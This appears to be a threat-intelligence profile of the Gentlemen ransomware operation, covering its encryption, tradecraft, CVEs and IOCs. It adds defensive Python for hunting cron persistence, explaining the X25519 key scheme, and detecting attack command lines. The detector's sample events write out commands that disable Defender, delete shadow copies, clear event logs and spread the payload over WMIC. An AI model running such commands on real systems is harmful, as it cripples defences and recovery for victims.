The Gentlemen
The Gentlemen is a ransomware-as-a-service (RaaS) operation that emerged around mid-2025 and had become one of the most active ransomware and extortion threats by early 2026. It operates through affiliates, and Microsoft tracks the operators as Storm-2697. Multiple sources describe links to the Qilin ecosystem and report that the operation is managed by the Russian-speaking actor known as hastalamuerte or zeta88; these attribution details come from public reporting and are not universally confirmed.
The malware supports multi-platform targeting. Reporting describes lockers for Windows, Linux, NAS, BSD, and VMware ESXi; the Windows variant is written in Go, and one report states the ESXi locker is written in C. The Windows encryptor requires a build-specific password at execution, which keeps the sample from running in automated analysis environments that do not supply it. Encryption is hybrid: the malware generates an ephemeral X25519 (Curve25519) key pair per file, derives a shared secret from the ephemeral private key and the operator's embedded public key, and encrypts file contents with XChaCha20 under a key tied to that secret; one Microsoft-analyzed sample appended the Base64-encoded ephemeral public key and a GENTLEMEN marker to each encrypted file. Smaller files are fully encrypted, while larger files are partially encrypted in chunks to shorten time-to-impact. Encrypted files have been observed with the .umc16h extension, random six-character extensions, and incident-specific extensions such as .fjn1jw. Ransom notes observed in reporting include README-GENTLEMEN.txt and READMEGENTLEMEN.txt, and a wallpaper artifact gentlemen.bmp is also associated with the family.
The Gentlemen uses double extortion: operators exfiltrate data before encryption and threaten publication on a leak site if victims do not pay. Reporting also notes negotiations via Tox or Session identifiers and use of a public leak portal. The operation has publicly claimed hundreds of victims across more than 70 countries, with activity observed across North America, South America, Europe, Africa, and Asia. Sectors named in reporting include education, transportation, healthcare, financial services, manufacturing, professional services, technology, construction, shipping, enterprise, and infrastructure organizations.
Observed tradecraft is mature and enterprise-focused. The malware and its operators disable Microsoft Defender real-time monitoring, add exclusions, delete Volume Shadow Copies, clear Windows event logs, remove forensic artifacts, terminate backup-, security-, database- and virtualization-related processes and services, and establish persistence via scheduled tasks and Run registry keys. Most of these steps require local administrator rights, and Defender tamper protection blocks the Set-MpPreference route used to switch off real-time monitoring. The ransomware can enumerate mapped drives and UNC shares, take ownership of files before encryption, optionally wipe free space, and self-delete. Microsoft reporting highlights especially aggressive self-propagation on Windows networks, with attempts to spread via SMB shares, PsExec, WMIC, scheduled tasks, services, PowerShell remoting, WMI, and Group Policy-based deployment.
Associated intrusion activity in reporting includes use of SystemBC proxy malware, Cobalt Strike, Mimikatz, AnyDesk, PowerShell, WinSCP, Nmap, Advanced IP Scanner, PsExec, WMI, and Group Policy Objects for domain-wide deployment. Initial access described in reporting includes stolen credentials, exposed remote services, RDP, purchased access, and exploitation or targeting of edge devices such as Fortinet FortiGate and Cisco systems; tracked vulnerabilities mentioned in reporting include CVE-2024-55591 (FortiOS/FortiProxy authentication bypass), CVE-2025-32433 (Erlang/OTP SSH server pre-authentication remote code execution), and CVE-2025-33073 (Windows SMB client elevation of privilege). Huntress documented incidents involving compromised accounts over RDP, scheduled tasks, Defender tampering, deployment from NETLOGON, and a SOCKS proxy binary communicating with 193.233.202[.]17 and 77.110.122[.]137. Additional infrastructure associated in reporting includes 91.107.247[.]163 and 45.86.230[.]112, and Microsoft published SHA-256 22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67 for a Gentlemen encryptor sample.
Detection names explicitly mentioned in reporting include Ransom:Win64/Gentlemen and Ransom:Win64/Gentlemen.SH!MTB. Reporting also notes a publicly released decryptor project described as recovering X25519 ephemeral keys from process memory dumps; such an approach can only recover files whose ephemeral private keys were still resident in a captured memory image, so preserving memory from affected hosts before they are rebooted or wiped is a prerequisite for using it.
Vulnerabilities exploited
Three CVEs are correlated with this family across public research and vendor advisories: CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073.
The Gentlemen, a ransomware-as-a-service (RaaS) operation, has quickly risen to become one of the most active ransomware programs in the world... Only once the network is firmly in their control do they deploy their custom ransomware locker and begin encrypting systems.
Groups observed using it
Two distinct threat actors have been attributed by public researchers.
The Gentlemen ransomware is a ransomware-as-a-service (RaaS) threat that is distinguished by its ability to pair its strong per-file encryption with an aggressive self-propagation capability designed to enable broad network compromise.
The Gentlemen is an active ransomware and extortion operation that emerged publicly in the second half of 2025 and rapidly scaled into a high-volume threat actor.
Techniques & procedures
36 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniques
The malware uses WMI via wmic.exe to create remote processes... The first command executes the defense evasion blob, the second runs the payload from the infected host’s SMB share, and the third runs the pre-staged copy from the target’s local C:\Temp directory.
ESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
When the --system argument is provided... the malware creates a scheduled task to re-execute itself as SYSTEM... The encryptor can establish persistence for itself through two mechanisms: scheduled tasks and registry keys.
This is complemented by the use of Cobalt Strike, Mimikatz, and domain-wide propagation via GPO, indicating a tightly coordinated, human-operated attack workflow...
Before attempting to run the payload on a remote system, the malware executes the following PowerShell command on the remote target to weaken local defenses... disables Microsoft Defender real-time monitoring, adds broad Defender exclusions, turns off Windows Firewall across all profiles...
To relaunch itself as SYSTEM, it issues the following sequence of commands... It first deletes any existing task named gentlemen_system... creates a new one-time task... and finally triggers that task.
Persistence
4 techniques
ESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
When the --system argument is provided... the malware creates a scheduled task to re-execute itself as SYSTEM... The encryptor can establish persistence for itself through two mechanisms: scheduled tasks and registry keys.
For establishing persistence with the registry... The GupdateS value under HKEY_LOCAL_MACHINE (HKLM) provides device-wide persistence... while the GupdateU value under HKEY_CURRENT_USER (HKCU) provides user-scoped persistence.
Privilege Escalation
4 techniques
ESXi variant adds cron entry @reboot sleep 60 && /bin/.vmware-authd <original_argv> via crontab -, providing additional boot persistence.
When the --system argument is provided... the malware creates a scheduled task to re-execute itself as SYSTEM... The encryptor can establish persistence for itself through two mechanisms: scheduled tasks and registry keys.
For deployment and impact, the group has been observed using domain-level mechanisms such as Group Policy and NETLOGON-based staging to push ransomware across compromised environments.
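The @reboot entry quoted above under Execution, Persistence and Privilege Escalation is a cheap thing to hunt for on ESXi, where root's crontab lives at /var/spool/cron/crontabs/root and the legitimate job list is short and stable. The Python below is an added example written for this page, not vendor tooling and not the locker's own code. The sample crontab is constructed: the benign-looking lines only imitate a stock ESXi crontab, and the arguments after the hidden binary are placeholders standing in for <original_argv>.

```python
import re
import sys

# Constructed sample crontab (not captured from an incident). The last line
# mirrors the @reboot entry described for the ESXi locker; "--placeholder-args"
# stands in for <original_argv>.
SAMPLE_CRONTAB = """\
#min hour mday month wday command
1 1 * * * /sbin/tmpwatch.py
1 * * * * /sbin/auto-backup.sh
0 * * * * /usr/lib/vmware/vmksummary/log-heartbeat.py
@reboot sleep 60 && /bin/.vmware-authd --placeholder-args
"""

# An absolute path whose final component starts with a dot, i.e. a hidden file
# dropped into a system binary directory. The legitimate ESXi vmware-authd is
# not a hidden file, so "/bin/.vmware-authd" is the tell.
HIDDEN_PATH = re.compile(r"(?:^|[\s=&|;])(/(?:[^\s/]+/)*\.[^\s/.][^\s/]*)")
DELAYED_START = re.compile(r"^sleep\s+\d+\s*&&")


def parse_crontab(text):
    """Yield (schedule, command) for each job, skipping comments and VAR=value lines.

    Handles both the five-field schedule and the @reboot/@daily style specials.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            sched, cmd = " ".join(fields[:5]), fields[5]
        yield sched, cmd.strip()


def suspicious_jobs(text):
    """Flag jobs that reference a hidden executable path on any schedule, and
    @reboot jobs that sleep before launching something (the pattern quoted on
    this page). Returns a list of findings, one per job."""
    findings = []
    for sched, cmd in parse_crontab(text):
        hidden = HIDDEN_PATH.findall(cmd)
        delayed = DELAYED_START.match(cmd) is not None
        if hidden or (sched == "@reboot" and delayed):
            findings.append({
                "schedule": sched,
                "command": cmd,
                "hidden_paths": hidden,
                "delayed_start": delayed,
            })
    return findings


if __name__ == "__main__":
    # Usage on a host: python3 hunt_cron.py /var/spool/cron/crontabs/root
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRONTAB
    for finding in suspicious_jobs(text):
        print(finding)
```

On a live host, compare the output against a known-good crontab from an unaffected ESXi of the same build rather than trusting the absence of findings; the check only catches hidden paths and the sleep-then-exec shape, not a payload given an innocuous name in a normal directory.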
Stealth
5 techniques
SystemBC establishes SOCKS5 network tunnels within the victim’s environment and connects to its C&C server using a custom RC4-encrypted protocol.
Ransomware components use generic names (r.exe, g.exe, o.exe) and common locations (C:\ProgramData\, C:\Temp\, admin shares) to blend with normal tools and admin activity.
It then clears the System, Application, and Security event logs using wevtutil to remove key audit trails.
These commands remove a variety of forensic artifacts, including prefetch files that track program execution, Defender diagnostic and support logs, and Remote Desktop Protocol (RDP) logs... If the --keep flag is not provided, the malware attempts to remove its executable from disk after completing encryption.
The malware binary carries an embedded copy of PsExec and drops it to C:\Temp\psexec.exe... If the embedded PsExec payload cannot be extracted successfully, the malware falls back to downloading PsExec directly from Microsoft’s Sysinternals Live service.
Defense Impairment
2 techniques
For establishing persistence with the registry... The GupdateS value under HKEY_LOCAL_MACHINE (HKLM) provides device-wide persistence... while the GupdateU value under HKEY_CURRENT_USER (HKCU) provides user-scoped persistence.
Credential Access
1 technique
This is complemented by the use of Cobalt Strike, Mimikatz...
Discovery
8 techniques
In addition to terminating processes, the malware disables and stops a list of Windows services using the commands...
After dropping PsExec, the malware attempts to enumerate and discover remote systems on the network, including workstations, servers, and domain controllers. Each discovered host becomes a candidate target for propagation.
The --spread argument accepts either explicit credentials in domain/user:password format for authenticated lateral movement, or an empty string to reuse the current session’s authentication token.
The malware stops a list of running processes using the command... The table below summarizes the different categories and processes being targeted.
The malware can only perform this task if it’s executed from an account with administrator privilege.
To enumerate all available volumes on the system, the malware executes the following PowerShell command sequence... performs a secondary enumeration routine by iterating through drive letters A through Z...
When the command-line argument --shares is provided, the malware initiates network share discovery and enumeration. It begins by probing all drive letters A through Z to identify mapped network drives...
Before encryption, the malware attempts to stop services and processes associated with databases, backup software, virtualization platforms, remote access tools, and enterprise applications.
Lateral Movement
3 techniques
The commands copy the malware executable into C:\Temp, create a hidden Server Message Block (SMB) share named share$ pointing to that directory... other systems on the network can retrieve the payload from \\<self>\share$.
The malware executes the following command sequence to create three Windows services on the target host... These services run as SYSTEM by default, which provides another high-privilege execution path for the ransomware payload on the remote system.
Using PowerShell remoting, the malware executes commands directly on the target using Invoke-Command. This method leverages Windows Remote Management (WinRM)...
The malware first stages its payload on the remote system by copying the encryptor binary over the administrative C$ share.
Command and Control
2 techniques
The adoption of SystemBC proxy malware, a SOCKS5-based botnet with over 1,570 infected corporate hosts, marks a transition from isolated intrusions to botnet-assisted, covert payload delivery at scale.
Using X25519 (the Diffie–Hellman primitive over Curve25519), it derives two values: first, the ephemeral public key ... and second, a shared secret by combining the ephemeral private key with the attacker’s public key.
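The two derivations just described, together with the Base64 ephemeral key and GENTLEMEN marker trailer noted in the overview, can be shown end to end. The Python below is an added example written for this page; it is not code from the malware, from Microsoft, or from the public decryptor project. It implements X25519 per RFC 7748 in pure Python (not constant-time, analysis use only) and assumes two things the page does not state: that the trailer is the 44-character Base64 public key immediately followed by the marker, and that the per-file symmetric key is derived from the shared secret with SHA-256. The XChaCha20 layer is not reimplemented; the ciphertext body in the demo is a placeholder.

```python
import base64
import hashlib
import os

P = 2**255 - 19
BASEPOINT = (9).to_bytes(32, "little")
MARKER = b"GENTLEMEN"   # marker appended to encrypted files (from the page)
B64_KEY_LEN = 44        # 32 raw bytes encode to 44 Base64 characters


def _clamp(k: bytes) -> int:
    a = bytearray(k)
    a[0] &= 248
    a[31] &= 127
    a[31] |= 64
    return int.from_bytes(a, "little")


def x25519(scalar: bytes, point: bytes) -> bytes:
    """RFC 7748 section 5 Montgomery ladder. Not constant-time."""
    k = _clamp(scalar)
    x1 = int.from_bytes(point, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb) % P) % P
        x2 = aa * bb % P
        z2 = e * (aa + 121665 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def file_key(shared_secret: bytes) -> bytes:
    # ASSUMPTION: the page does not say how the XChaCha20 key is derived from
    # the X25519 shared secret; SHA-256 stands in for whatever KDF is used.
    return hashlib.sha256(shared_secret).digest()


def seal(attacker_pub: bytes, eph_priv: bytes) -> tuple:
    """Encryptor side for one file: returns (per-file key, trailer).

    ASSUMPTION: trailer layout is Base64(ephemeral public key) immediately
    followed by the marker; the page only says both are appended.
    """
    eph_pub = x25519(eph_priv, BASEPOINT)
    key = file_key(x25519(eph_priv, attacker_pub))
    return key, base64.b64encode(eph_pub) + MARKER


def parse_trailer(blob: bytes) -> tuple:
    """Split an encrypted file into (ciphertext, ephemeral public key)."""
    if not blob.endswith(MARKER):
        raise ValueError("no GENTLEMEN marker at end of file")
    body = blob[: -len(MARKER)]
    eph_pub = base64.b64decode(body[-B64_KEY_LEN:], validate=True)
    if len(eph_pub) != 32:
        raise ValueError("ephemeral public key is not 32 bytes")
    return body[:-B64_KEY_LEN], eph_pub


def key_from_attacker_private(attacker_priv: bytes, eph_pub: bytes) -> bytes:
    """What the operator's decryptor computes from the trailer alone."""
    return file_key(x25519(attacker_priv, eph_pub))


def key_from_recovered_ephemeral(eph_priv: bytes, attacker_pub: bytes) -> bytes:
    """What a memory-dump decryptor computes: the ephemeral private key was in
    the encryptor's memory while the file was processed, and the operator's
    public key ships inside the binary."""
    return file_key(x25519(eph_priv, attacker_pub))


def demo() -> bool:
    attacker_priv = os.urandom(32)
    attacker_pub = x25519(attacker_priv, BASEPOINT)
    eph_priv = os.urandom(32)                      # fresh per file
    key, trailer = seal(attacker_pub, eph_priv)
    blob = b"<xchacha20 ciphertext placeholder>" + trailer
    _, eph_pub = parse_trailer(blob)
    return (key_from_attacker_private(attacker_priv, eph_pub) == key
            == key_from_recovered_ephemeral(eph_priv, attacker_pub))


if __name__ == "__main__":
    print("both decryption routes agree:", demo())
```

The last two functions show the asymmetry a memory-dump decryptor exploits: the operator decrypts with a private key the victim never sees, but the same per-file key also falls out of the ephemeral private key, which necessarily existed in the encryptor process while that file was being handled. Nothing in the trailer alone is enough; without either private key the per-file key is unrecoverable, which is why a memory image taken before reboot is the only non-payment route.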
Exfiltration
2 techniques
The group also steals data before locking systems, using that stolen information as an additional lever to pressure victims into paying.
The operators behind the ransomware use double extortion tactics, encrypting data while also exfiltrating sensitive information to pressure victims through the threat of public release if the ransom is not paid.
Impact
4 techniques
The operators behind the ransomware use double extortion tactics, encrypting data while also exfiltrating sensitive information to pressure victims through the threat of public release if the ransom is not paid.
In addition to terminating processes, the malware disables and stops a list of Windows services... backup, storage, and recovery software... EDR... Microsoft Exchange...
To further impede recovery efforts, the malware deletes all Volume Shadow Copies using both vssadmin and wmic... If the --wipe argument is provided... overwrites all unallocated disk space with random data.
The group also steals data before locking systems, using that stolen information as an additional lever to pressure victims into paying... The group uses stolen data as a central part of its pressure strategy, threatening to publish sensitive files on its leak site if victims refuse to pay.
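The Defender tampering, shadow copy deletion, log clearing, SYSTEM scheduled task, Run-key, hidden share and WMIC steps quoted in the sections above all surface in process-creation telemetry (Sysmon event 1, or Security event 4688 with command-line auditing on). The Python below is an added example for this page, not a vendor rule set: it runs a small rule table over constructed sample events and flags a host only when rules from several tactics fire within a short window, which separates the pre-encryption sequence from an administrator doing one of these things in isolation. The page-supplied identifiers are gentlemen_system, GupdateS/GupdateU, share$, C:\Temp\psexec.exe and the r.exe/g.exe/o.exe names; the exact switches in the patterns and sample events (vssadmin /all /quiet, the net share grant, schtasks /ru SYSTEM) are assumptions drawn from common usage, since the page quotes the behaviour rather than full command lines.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, tactic, regex over the full command line). Case-insensitive.
RULES = [
    ("defender_realtime_off", "defense_evasion",
     r"Set-MpPreference\b.*-DisableRealtimeMonitoring"),
    ("defender_exclusion", "defense_evasion",
     r"(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension)"),
    ("event_log_clear", "defense_evasion",
     r"wevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+"),
    ("shadow_copy_delete", "impact",
     r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete"),
    ("gentlemen_system_task", "privilege_escalation",
     r'schtasks(?:\.exe)?\s+/create\b.*/tn\s+"?gentlemen_system\b'),
    ("gupdate_run_key", "persistence",
     r"reg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b.*\bGupdate[SU]\b"),
    ("hidden_staging_share", "lateral_movement",
     r"net(?:\.exe)?\s+share\s+share\$=C:\\Temp"),
    ("remote_exec_wmic", "lateral_movement",
     r"wmic(?:\.exe)?\s+/node:\S+.*\bprocess\s+call\s+create\b"),
    ("psexec_from_temp", "lateral_movement",
     r"C:\\Temp\\psexec\.exe"),
    ("generic_payload_name", "stealth",
     r"C:\\(?:ProgramData|Temp)\\[rgo]\.exe\b"),
]
COMPILED = [(n, t, re.compile(p, re.IGNORECASE)) for n, t, p in RULES]

# Constructed sample events (not from a real incident). The first six imitate
# the sequence on one host; the last two are benign admin activity.
EVENTS = [
    {"ts": "2026-01-14T02:11:03Z", "host": "WS-117", "user": r"CORP\svc_backup",
     "cmd": r'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\Temp"'},
    {"ts": "2026-01-14T02:11:09Z", "host": "WS-117", "user": r"CORP\svc_backup",
     "cmd": r"schtasks.exe /create /tn gentlemen_system /ru SYSTEM /sc once /st 02:12 /tr C:\Temp\g.exe /f"},
    {"ts": "2026-01-14T02:11:41Z", "host": "WS-117", "user": r"NT AUTHORITY\SYSTEM",
     "cmd": r"vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2026-01-14T02:11:42Z", "host": "WS-117", "user": r"NT AUTHORITY\SYSTEM",
     "cmd": r"wevtutil.exe cl Security"},
    {"ts": "2026-01-14T02:12:05Z", "host": "WS-117", "user": r"NT AUTHORITY\SYSTEM",
     "cmd": r"net.exe share share$=C:\Temp /grant:everyone,full"},
    {"ts": "2026-01-14T02:12:30Z", "host": "WS-117", "user": r"NT AUTHORITY\SYSTEM",
     "cmd": r'wmic.exe /node:"FS-02" /user:CORP\svc_backup process call create "cmd /c \\WS-117\share$\g.exe"'},
    {"ts": "2026-01-14T03:00:00Z", "host": "SRV-BK", "user": r"CORP\backupadmin",
     "cmd": r"vssadmin.exe list shadows"},
    {"ts": "2026-01-14T09:15:00Z", "host": "WS-042", "user": r"CORP\jdoe",
     "cmd": r"powershell.exe Get-MpPreference"},
]


def match_event(cmd):
    """All (rule, tactic) pairs whose pattern matches one command line."""
    return [(n, t) for n, t, rx in COMPILED if rx.search(cmd)]


def scan(events):
    """One hit record per (event, rule) match."""
    hits = []
    for e in events:
        for name, tactic in match_event(e["cmd"]):
            hits.append({"ts": e["ts"], "host": e["host"], "user": e["user"],
                         "rule": name, "tactic": tactic})
    return hits


def hosts_with_chain(hits, min_tactics=3, window=timedelta(minutes=30)):
    """Hosts on which rules from at least min_tactics distinct tactics fired
    inside a sliding window of the given length."""
    by_host = defaultdict(list)
    for h in hits:
        ts = datetime.fromisoformat(h["ts"].replace("Z", "+00:00"))
        by_host[h["host"]].append((ts, h["tactic"]))
    flagged = []
    for host, items in by_host.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            tactics = {tac for t, tac in items[i:] if t - t0 <= window}
            if len(tactics) >= min_tactics:
                flagged.append(host)
                break
    return sorted(flagged)


if __name__ == "__main__":
    found = scan(EVENTS)
    for h in found:
        print(h["ts"], h["host"], h["rule"])
    print("hosts with pre-encryption chain:", hosts_with_chain(found))
```

The single-rule hits are worth alerting on individually (shadow copy deletion and the gentlemen_system task name have almost no benign rate), while the chain check is what justifies isolating a host automatically: the page describes Defender impairment, persistence and shadow deletion happening on the same machine minutes apart, before the encryptor spreads via share$ and WMIC.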
Other
2 techniques
IOCs tracked for this family
102 indicators are attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
26 sources are tracked across advisories, community write-ups, and news.
Go-based ransomware-as-a-service for Windows that uses Curve25519 and XChaCha20 for per-file encryption, employs double extortion, disables defenses, establishes persistence, traverses local and network shares, and includes aggressive worm-like lateral movement using PsExec, WMI, scheduled tasks, services, and PowerShell remoting.
A ransomware-as-a-service operation active since mid-2025. In the described incidents, operators used Scheduled Tasks, PowerShell, log clearing, and antivirus evasion to deploy encryptors, then dropped README-GENTLEMEN.txt ransom notes and encrypted files.
Multi-platform ransomware used in large-scale enterprise attacks across Windows, Linux, NAS, BSD, and VMware ESXi environments. It encrypts files, drops a READMEGENTLEMEN.txt ransom note, stops database/backup/virtualization services before encryption, and uses stolen data for double extortion.
Multi-platform ransomware with extortion capabilities targeting Windows, Linux, NAS, BSD, and VMware ESXi environments. It uses data theft as a core pressure tactic, stops services and processes before encryption, and supports enterprise-wide deployment workflows.